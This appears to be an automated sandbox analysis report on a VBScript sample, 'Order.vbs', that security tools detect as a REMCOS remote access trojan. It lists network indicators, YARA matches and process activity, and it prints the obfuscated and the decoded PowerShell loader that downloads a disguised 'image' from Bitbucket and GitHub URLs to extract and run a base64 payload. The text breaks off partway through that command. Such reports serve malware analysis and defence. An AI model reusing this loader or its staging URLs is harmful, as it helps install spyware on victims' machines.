              Source: global trafficHTTP traffic detected: GET /cbff8810-ace3-4466-81b1-12ba7827c90a/downloads/6b181c48-ea9d-4bf0-91bd-66321b83871e/img_test.jpg?response-content-disposition=attachment%3B%20filename%3D%22img_test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNO4DHE4VD&Signature=T6wewlQZbJQSKGkGpdqwpwnElD0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECcaCXVzLWVhc3QtMSJHMEUCIHdpGFp%2BMWJdC40IhWJ3SSuh%2F3P9BfkWVJgGy%2F5d%2FxJrAiEA7cnRTAkYqS7IEoVvpfPhmiGIFqnW%2BTusWS1k%2B1LqRikqsAIIkP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJ3hZc5H13DpsrVvSiqEAljj%2Feh582Kf2l0rpXwuMkBTuVn5fmjxN%2F1UiGutq1P4eK6JpawNdKFwSb8l%2FBnJ7U5ngONu60OLxfc6clZbFgjDwM4%2Binq%2BtGirnaPvueTnkbFKwYcig0YN%2BXANfigCXdSciOrBg%2BF8ITeQUmtEngmT7cfpw%2FcS7o0Ca21R7rEL4sAFd%2FQGP4LHIKW4I8PHOJS7KDTwFSdbyJh0ZlsbBUKsG6nqervFT%2BkQqDFEvcCT3UE%2Bgf5YOa2Imez9jOuySSc0y0JrDCQxV0VL5777zwENSg149ioqUwRzrSQZ5r4uHdbGlyudfflZEMvBEQk5PSM9xVer2lqAPOQ8TCemuoAB0naRMM%2Fa2bgGOp0BRtpiv1UEzqz9j23bqShE4p37bMiYIPCEIVvttSlSIWNWclxJdsdz%2FKRhdxCMY6AmnPnHOIwyQPueK%2BLYy%2FV5HlKlvGL7cX5kPi6DbUpaR6DWxL6p2AoqNVyGjtCQwiwBbff1ljXgOuGBmoyLJFZstpwAA%2FyrPqTNeLsWXeL0vsNRfQh02Nz7sQLG0XBmnN05UIwxcpj6jLvFo2Veyw%3D%3D&Expires=1729524823 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /IJEUWAESIKA/skyapb/refs/heads/main/kgpmmrd.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: bitbucket.org
              Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
              Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: svchost.exe, 0000000C.00000002.3508659507.0000011BAF400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
              Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: edb.log.12.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: RegAsm.exe, 00000008.00000002.3509300667.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: RegAsm.exe, 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp(cZ
              Source: RegAsm.exe, 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: RegAsm.exe, 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp6
              Source: RegAsm.exe, 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
              Source: powershell.exe, 00000006.00000002.2379283237.000001F505933000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
              Source: powershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504260000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000003.00000002.2679834341.0000028186F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F500001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504260000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000003.00000002.2679834341.0000028186F29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
              Source: powershell.exe, 00000003.00000002.2679834341.0000028186F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F500001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F505256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F50527C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
              Source: powershell.exe, 00000006.00000002.2379283237.000001F505256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F50527C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/cbff8810-ace3-4466-81b1-12ba7827c90a/downloads/6b181c48-ea9d-
              Source: powershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
              Source: powershell.exe, 00000003.00000002.2679834341.000002818745F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F5045C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
              Source: edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
              Source: svchost.exe, 0000000C.00000003.2433659954.0000011BAF600000.00000004.00000800.00020000.00000000.sdmp, edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
              Source: powershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5055F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F5045C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F505933000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504026000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504026000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/IJEUWAESIKA/skyapb/refs/heads/main/kgpmmrd.txt
              Source: powershell.exe, 00000003.00000002.2679834341.000002818745F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F5045C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
              Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknown | Network traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.6:49758 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 52.217.161.161:443 -> 192.168.2.6:49764 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49789 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow, 8_2_0040F4A7

              E-Banking Fraud

              Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7436, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00414D7F SystemParametersInfoW, 8_2_00414D7F

              System Summary

              Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: Process Memory Space: powershell.exe PID: 1880, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#
bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow, 8_2_0040F4A7
              Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040F4A7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00417621
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041606A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0042E240
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043120A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0042B2F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004304C1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041F4D3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0044B4B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0044553C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043163F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004476F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043B690
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0042D79B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043680C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040D9A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004309BD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00436A3B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041FB71
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00445C59
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041FCB4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00430DD5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041EFDC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 0042BE7E appears 33 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 0042C720 appears 50 times
              Source: Order.vbs | Initial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 4528
              Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: Process Memory Space: powershell.exe PID: 1880, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine | Classification label: mal100.rans.spre.troj.spyw.expl.evad.winVBS@10/13@4/6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00410D25 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 8_2_00410D25
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040A7FF CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 8_2_0040A7FF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00413B85 FindResourceA,LoadResource,LockResource,SizeofResource, 8_2_00413B85
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00413168 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 8_2_00413168
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-MBKA6A
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oiyygwzw.jro.ps1
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: Order.vbs | ReversingLabs: Detection: 13%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex 